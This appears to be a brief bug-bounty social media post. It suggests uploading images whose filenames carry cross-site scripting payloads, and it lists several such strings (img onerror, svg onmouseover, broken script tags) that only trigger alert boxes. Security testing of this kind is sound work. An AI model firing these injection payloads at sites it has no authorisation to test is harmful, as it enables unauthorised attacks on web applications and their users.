#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png
5
244
703
0
217
